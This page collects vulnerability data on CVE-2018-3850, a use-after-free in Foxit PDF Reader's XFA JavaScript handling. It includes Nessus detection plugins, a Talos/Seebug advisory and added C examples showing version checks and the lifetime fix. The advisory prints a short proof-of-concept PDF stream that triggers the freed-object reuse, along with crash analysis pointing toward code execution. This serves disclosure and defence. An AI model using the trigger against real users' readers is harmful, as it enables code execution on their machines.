CVE-2018-3850 - Use After Free vulnerability in Foxit PDF Reader 9.0.1.1049

047910
CVSS 8.8 - HIGH
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: HIGH
Integrity impact: HIGH
Availability impact: HIGH
Tags: network, low complexity, foxit, CWE-416, nessus

Summary

An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.0.1.1049. A specially crafted PDF document can cause a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.

Vulnerable Configurations

Part         Description   Count
Application  Foxit         1

Common Weakness Enumeration (CWE)

CWE-416: Use After Free

Nessus

  • NASL family: Windows
    NASL id: FOXIT_PHANTOM_8_3_6.NASL
    description: According to its version, the Foxit PhantomPDF application (formerly known as Phantom) installed on the remote Windows host is prior to 8.3.6. It is, therefore, affected by multiple vulnerabilities.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 119837
    published: 2018-12-21
    reporter: This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/119837
    title: Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(119837);
      script_version("1.3");
      script_cvs_date("Date: 2019/10/31 15:18:52");
    
      script_cve_id(
        "CVE-2017-14458",
        "CVE-2017-17557",
        "CVE-2018-3842",
        "CVE-2018-3843",
        "CVE-2018-3850",
        "CVE-2018-3853",
        "CVE-2018-10302",
        "CVE-2018-10303"
      );
      script_bugtraq_id(103942, 103999);
    
      script_name(english:"Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities");
      script_summary(english:"Checks the version of Foxit PhantomPDF.");
    
      script_set_attribute(attribute:"synopsis", value:
    "A PDF toolkit installed on the remote Windows host is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "According to its version, the Foxit PhantomPDF application (formally
    known as Phantom) installed on the remote Windows host is prior to
    8.3.6. It is, therefore, affected by multiple vulnerabilities.");
      # https://www.foxitsoftware.com/support/security-bulletins.php
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?2f244c3e");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Foxit PhantomPDF version 8.3.6 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-3853");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/07");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/05/07");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/12/21");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:phantom");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:phantompdf");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("foxit_phantom_installed.nasl");
      script_require_keys("installed_sw/FoxitPhantomPDF");
    
      exit(0);
    }
    
    include('vcf.inc');
    
    app = 'FoxitPhantomPDF';
    
    app_info = vcf::get_app_info(app:app, win_local:TRUE);
    
    constraints = [{
      'min_version' : '8.0',
      'max_version' : '8.3.5.30351',
      'fixed_version' : '8.3.6'
      }];
    
    vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);
    
  • NASL family: Windows
    NASL id: FOXIT_READER_9_1_0_5096.NASL
    description: The version of Foxit Reader installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.
    last seen: 2020-04-30
    modified: 2018-04-27
    plugin id: 109399
    published: 2018-04-27
    reporter: This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/109399
    title: Foxit Reader < 9.1 Multiple Vulnerabilities
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(109399);
      script_version("1.6");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/04/27");
    
      script_cve_id(
        "CVE-2017-14458",
        "CVE-2017-17557",
        "CVE-2018-3842",
        "CVE-2018-3850",
        "CVE-2018-3853"
      );
      script_bugtraq_id(103942);
      script_xref(name:"ZDI", value:"ZDI-18-312");
      script_xref(name:"ZDI", value:"ZDI-18-313");
      script_xref(name:"ZDI", value:"ZDI-18-315");
      script_xref(name:"ZDI", value:"ZDI-18-329");
      script_xref(name:"ZDI", value:"ZDI-18-330");
      script_xref(name:"ZDI", value:"ZDI-18-331");
      script_xref(name:"ZDI", value:"ZDI-18-332");
      script_xref(name:"ZDI", value:"ZDI-18-335");
      script_xref(name:"ZDI", value:"ZDI-18-339");
      script_xref(name:"ZDI", value:"ZDI-18-340");
      script_xref(name:"ZDI", value:"ZDI-18-341");
      script_xref(name:"ZDI", value:"ZDI-18-342");
      script_xref(name:"ZDI", value:"ZDI-18-344");
      script_xref(name:"ZDI", value:"ZDI-18-345");
      script_xref(name:"ZDI", value:"ZDI-18-346");
      script_xref(name:"ZDI", value:"ZDI-18-348");
      script_xref(name:"ZDI", value:"ZDI-18-349");
      script_xref(name:"ZDI", value:"ZDI-18-350");
      script_xref(name:"ZDI", value:"ZDI-18-351");
      script_xref(name:"ZDI", value:"ZDI-18-352");
      script_xref(name:"ZDI", value:"ZDI-18-354");
      script_xref(name:"ZDI", value:"ZDI-18-358");
      script_xref(name:"ZDI", value:"ZDI-18-359");
    
      script_name(english:"Foxit Reader < 9.1 Multiple Vulnerabilities");
      script_summary(english:"Checks the version of Foxit Reader.");
    
      script_set_attribute(attribute:"synopsis", value:
    "A PDF viewer installed on the remote Windows host is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Foxit Reader installed on the remote Windows host is
    prior to 9.1. It is, therefore, affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"see_also", value:"https://www.foxitsoftware.com/support/security-bulletins.php");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Foxit Reader version 9.1 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-14458");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/19");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/04/19");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/27");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:foxit_reader");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("foxit_reader_installed.nasl");
      script_require_keys("installed_sw/Foxit Reader");
    
      exit(0);
    }
    
    include('vcf.inc');
    
    app = 'Foxit Reader';
    
    app_info = vcf::get_app_info(app:app, win_local:TRUE);
    
    constraints = [{
      'min_version' : '9.0',
      'fixed_version' : '9.1.0.5096'
      }];
    
    vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);
    
  • NASL family: Windows
    NASL id: FOXIT_PHANTOM_9_1_0_5096.NASL
    description: According to its version, the Foxit PhantomPDF application (formerly known as Phantom) installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 109398
    published: 2018-04-27
    reporter: This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/109398
    title: Foxit PhantomPDF < 9.1 Multiple Vulnerabilities
  • NASL family: Windows
    NASL id: FOXIT_PHANTOM_9_1_0.NASL
    description: According to its version, the Foxit PhantomPDF application (formerly known as Phantom) installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.
    last seen: 2020-04-30
    modified: 2018-12-21
    plugin id: 119838
    published: 2018-12-21
    reporter: This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/119838
    title: Foxit PhantomPDF < 9.1 Multiple Vulnerabilities
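Both NASL scripts above end in the same `vcf::check_version_and_report` call with a constraint of `min_version`, optional `max_version` and `fixed_version`. The C program below is an added example, not Tenable's code and not a NASL interpreter: it reimplements that comparison so the two constraint blocks from this page can be evaluated offline against a constructed inventory of version strings. The semantics (inclusive min/max bounds, numeric dotted comparison, missing components treated as 0, flagged only when strictly below `fixed_version`) are my reading of the plugin logic, stated here as an assumption rather than a quotation of the library.

```c
#include <stdlib.h>
#include <string.h>

/* Constraint in the shape the NASL plugins use; NULL means "not set". */
struct constraint {
    const char *min_version;
    const char *max_version;
    const char *fixed_version;
};

/* Read one dotted component as a number and advance past the next '.'.
 * A non-numeric or missing component counts as 0. */
static long next_component(const char **s)
{
    char *end;
    long v = strtol(*s, &end, 10);
    if (end == *s) v = 0;
    const char *dot = strchr(end, '.');
    *s = dot ? dot + 1 : end + strlen(end);
    return v;
}

/* Numeric dotted comparison: <0, 0, >0 like strcmp, so "9.1" == "9.1.0.0". */
int version_cmp(const char *a, const char *b)
{
    while (*a || *b) {
        long x = next_component(&a);
        long y = next_component(&b);
        if (x != y) return x < y ? -1 : 1;
    }
    return 0;
}

/* 1 if installed lies within [min_version, max_version] (each bound only when set)
 * and is strictly below fixed_version; 0 otherwise. Assumed reading of vcf semantics. */
int is_vulnerable(const char *installed, const struct constraint *c)
{
    if (c->min_version && version_cmp(installed, c->min_version) < 0) return 0;
    if (c->max_version && version_cmp(installed, c->max_version) > 0) return 0;
    return version_cmp(installed, c->fixed_version) < 0;
}

/* The two constraint blocks from the plugins on this page. */
const struct constraint reader_9_1    = { "9.0", NULL,          "9.1.0.5096" };
const struct constraint phantom_8_3_6 = { "8.0", "8.3.5.30351", "8.3.6" };

/* Count how many entries of an inventory a constraint flags. */
int count_flagged(const struct constraint *c, const char *const *versions, int n)
{
    int flagged = 0;
    for (int i = 0; i < n; i++) flagged += is_vulnerable(versions[i], c);
    return flagged;
}

int main(void)
{
    /* Constructed sample inventory, not data taken from a real host. */
    static const char *const inventory[] = {
        "9.0.1.1049",   /* the build named in the advisory: flagged by reader_9_1 */
        "9.1.0.5096",   /* the fixed Reader build: not flagged */
        "8.3.5.30351",  /* last affected PhantomPDF 8.x build: flagged by phantom_8_3_6 */
        "8.3.6",        /* fixed PhantomPDF build: not flagged */
        "9.2.0.1",      /* later build: not flagged by either */
    };
    int n = (int)(sizeof inventory / sizeof inventory[0]);
    return (count_flagged(&reader_9_1, inventory, n) == 1 &&
            count_flagged(&phantom_8_3_6, inventory, n) == 1) ? 0 : 1;
}
```

One practical caveat the comparison makes visible: a host that reports its version as the short string "9.1" compares below "9.1.0.5096" after zero-padding, so a scanner that trusts a truncated version string will still flag a patched install. Reading the full four-component build number, as the plugins do via `vcf::get_app_info`, avoids that false positive.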

Seebug

bulletinFamily: exploit
description:
### Summary
An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.0.1.1049. A specially crafted PDF document can cause a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.

### Tested Versions
Foxit PDF Reader 9.0.1.1049

### Product URLs
https://www.foxitsoftware.com/products/pdf-reader/

### CVSSv3 Score
8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

### CWE
CWE-416: Use After Free

### Details
Foxit PDF Reader is one of the most popular PDF document readers and has a widespread user base. It aims to have feature parity with Adobe's Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Additionally, Foxit PDF Reader supports XFA, or XML Forms Architecture, which is a new way of making interactive PDF forms. If a document containing XFA forms executes JavaScript code that closes the active document, a specific XFA method is invoked which keeps a stale reference to a now-freed object; this leads to a use-after-free condition, which can be abused to execute arbitrary code.

This particular vulnerability lies in the this.xfa.clone() method, which triggers a use-after-free condition when the following code is executed in a regular PDF document:

```
1348 0 obj
<< /Length 25 >>
stream
app.activeDocs[0].closeDoc( );
this.xfa.clone( );
endstream
endobj
```

Opening this proof-of-concept PDF document in Foxit Reader with PageHeap enabled results in the following crash (note that Foxit Reader will pop up a warning that the file is damaged due to malformed XFA objects, which is of no consequence to triggering the vulnerability):

```
(24c.834): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FoxitReader.exe -
eax=11deaef8 ebx=00000000 ecx=12edadb0 edx=0027e90c esi=11deaef8 edi=0027e9d8
eip=01910916 esp=0027e8c8 ebp=0027e8cc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
FoxitReader!CertFreeCertificateChain+0x64536:
01910916 8b01            mov     eax,dword ptr [ecx]  ds:0023:12edadb0=????????
0:000> !heap -p -a ecx
    address 12edadb0 found in
    _DPH_HEAP_ROOT @ 72e1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    12e51b2c:         12eda000             2000
    6b2e90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    777569d4 ntdll!RtlDebugFreeHeap+0x0000002f
    77719e5b ntdll!RtlpFreeHeap+0x0000005d
    776e6416 ntdll!RtlFreeHeap+0x00000142
    75b9c5f4 kernel32!HeapFree+0x00000014
    02c4b1fb FoxitReader!CertFreeCertificateChain+0x0139ee1b
    0127eab8 FoxitReader+0x000ceab8
    01280ae8 FoxitReader+0x000d0ae8
    013c79de FoxitReader+0x002179de
    013c77ab FoxitReader+0x002177ab
    013d698a FoxitReader+0x0022698a
    013c13f7 FoxitReader+0x002113f7
    013c1218 FoxitReader+0x00211218
    02aa24f9 FoxitReader!CertFreeCertificateChain+0x011f6119
    02aa63fc FoxitReader!CertFreeCertificateChain+0x011fa01c
    02aa648b FoxitReader!CertFreeCertificateChain+0x011fa0ab
    75a9c4b7 USER32!InternalCallWinProc+0x00000023
    75a9c5b7 USER32!UserCallWinProcCheckWow+0x0000014b
    75a95264 USER32!SendMessageWorker+0x000004d0
    75a95552 USER32!SendMessageW+0x0000007c
    013bee15 FoxitReader+0x0020ee15
    02aa8172 FoxitReader!CertFreeCertificateChain+0x011fbd92
    02aa24f9 FoxitReader!CertFreeCertificateChain+0x011f6119
    02aa63fc FoxitReader!CertFreeCertificateChain+0x011fa01c
    02aa648b FoxitReader!CertFreeCertificateChain+0x011fa0ab
    75a9c4b7 USER32!InternalCallWinProc+0x00000023
    75a9c5b7 USER32!UserCallWinProcCheckWow+0x0000014b
    75a95264 USER32!SendMessageWorker+0x000004d0
    75a95552 USER32!SendMessageW+0x0000007c
    012ea7c7 FoxitReader+0x0013a7c7
    01916eb9 FoxitReader!CertFreeCertificateChain+0x0006aad9
    01924769 FoxitReader!CertFreeCertificateChain+0x00078389
0:000>
```

Analyzing the heap state clearly shows that ecx points to a freed memory region.

If we examine the next few instructions we can see the following:

```
FoxitReader!CertFreeCertificateChain+0x64536:
01910916 8b01            mov     eax,dword ptr [ecx]
01910918 8b5008          mov     edx,dword ptr [eax+8]
0191091b 57              push    edi
0191091c ffd2            call    edx
0191091e 85c0            test    eax,eax
01910920 745a            je      FoxitReader!CertFreeCertificateChain+0x6459c (0191097c)
01910922 8b4e5c          mov     ecx,dword ptr [esi+5Ch]
01910925 8b01            mov     eax,dword ptr [ecx]
0:000>
```

We can see that there is a call instruction immediately after the dereference of ecx, which we know to be free. With proper memory layout control, the memory chunk pointed to by ecx can be reallocated before it is reused, which gives full control over its content and can ultimately result in EIP control and arbitrary code execution.

### Timeline
* 2018-02-26 - Vendor Disclosure
* 2018-04-01 - Vendor pushed release to mid April
* 2018-04-19 - Vendor patch released
* 2018-04-19 - Public disclosure
id: SSV:97302
last seen: 2018-06-08
modified: 2018-05-17
published: 2018-05-17
reporter: Knownsec
title: Foxit PDF Reader JavaScript XFA Clone Remote Code Execution Vulnerability (CVE-2018-3850)
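The crash in the advisory above is a virtual call through a pointer that the XFA object kept after closeDoc() had freed the document: load the object (`mov eax,[ecx]`), load a vtable slot (`mov edx,[eax+8]`), call it. The C program below is an added illustration of that object-lifetime defect and of the lifetime fix; it is not Foxit's code and not a reconstruction of its internals, and every name in it (document, xfa_handle, app, close_doc_unsafe, close_doc_safe, xfa_clone) is invented for the example. `close_doc_unsafe` frees the document while the handle still holds it; `close_doc_safe` drops only the owner's reference and marks the document closed, so the state check in `xfa_clone` reads live memory. The example never dereferences the dangling pointer on the unsafe path; it only shows that the handle still holds it.

```c
#include <stdlib.h>
#include <string.h>

struct document;

/* Operations table: the vtable the crash reaches through [ecx] -> [eax+8]. */
struct doc_ops {
    int (*clone)(struct document *d);
};

struct document {
    const struct doc_ops *ops;
    int refcount;    /* live owners: the app's active slot plus the XFA handle */
    int closed;      /* set on close; a closed document must not be cloned */
    char name[32];
};

/* An XFA object that caches a pointer to its document (the stale reference). */
struct xfa_handle {
    struct document *doc;
};

struct app {
    struct document *active;   /* app.activeDocs[0] in the PoC */
    struct xfa_handle xfa;     /* this.xfa in the PoC */
};

static int doc_clone_impl(struct document *d)
{
    return (int)strlen(d->name);   /* stand-in for real clone work */
}

static const struct doc_ops default_ops = { doc_clone_impl };

/* Open a document and hand a reference to both the app slot and the XFA handle. */
static struct document *doc_open(struct app *app, const char *name)
{
    struct document *d = calloc(1, sizeof *d);
    if (!d) return NULL;
    d->ops = &default_ops;
    d->refcount = 2;
    strncpy(d->name, name, sizeof d->name - 1);
    app->active = d;
    app->xfa.doc = d;
    return d;
}

static void doc_release(struct document *d)
{
    if (d && --d->refcount == 0) free(d);
}

/* Vulnerable pattern: closeDoc() frees the object outright; app->xfa.doc now dangles. */
void close_doc_unsafe(struct app *app)
{
    free(app->active);
    app->active = NULL;
}

/* Hardened pattern: closing drops only the app's reference and marks the document closed. */
void close_doc_safe(struct app *app)
{
    struct document *d = app->active;
    if (!d) return;
    d->closed = 1;
    app->active = NULL;
    doc_release(d);
}

/* xfa.clone(): object load, vtable-slot load, indirect call. The closed check is only
 * meaningful when the handle's own reference keeps the object alive; after
 * close_doc_unsafe the check itself would be the freed-memory read seen at 01910916. */
int xfa_clone(struct xfa_handle *x)
{
    struct document *d = x->doc;
    if (!d || d->closed) return -1;
    return d->ops->clone(d);
}

void xfa_detach(struct xfa_handle *x)
{
    doc_release(x->doc);
    x->doc = NULL;
}

/* Clone while the document is open: returns strlen("form.pdf"), i.e. 8. */
int clone_while_open(void)
{
    struct app app = {0};
    if (!doc_open(&app, "form.pdf")) return -2;
    int rc = xfa_clone(&app.xfa);
    close_doc_safe(&app);
    xfa_detach(&app.xfa);
    return rc;
}

/* The PoC's order, closeDoc() then xfa.clone(), on the hardened lifecycle: refused with -1. */
int safe_lifecycle(void)
{
    struct app app = {0};
    if (!doc_open(&app, "form.pdf")) return -2;
    close_doc_safe(&app);
    int rc = xfa_clone(&app.xfa);
    xfa_detach(&app.xfa);          /* last reference dropped: freed here, after all use */
    return rc;
}

/* The same order on the unsafe lifecycle: the handle still holds the freed pointer.
 * Calling xfa_clone here would be the use-after-free; this only inspects the pointer. */
int unsafe_dangles(void)
{
    struct app app = {0};
    if (!doc_open(&app, "form.pdf")) return 0;
    close_doc_unsafe(&app);
    return app.xfa.doc != NULL;
}

int main(void)
{
    return (clone_while_open() == 8 && safe_lifecycle() == -1 && unsafe_dangles()) ? 0 : 1;
}
```

The design point is that a "closed" flag or any other check stored in the object cannot defend a dangling pointer, because evaluating the check is itself the invalid read; the fix has to be in ownership, so that every cached reference (here the XFA handle) keeps the object alive until it lets go. PageHeap makes the difference observable, which is why the advisory's crash lands on the very first dereference rather than on the later `call edx`.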

Talos

id: TALOS-2018-0532
last seen: 2019-05-29
published: 2018-04-19
reporter: Talos Intelligence
source: http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0532
title: Foxit PDF Reader JavaScript XFA Clone Remote Code Execution Vulnerability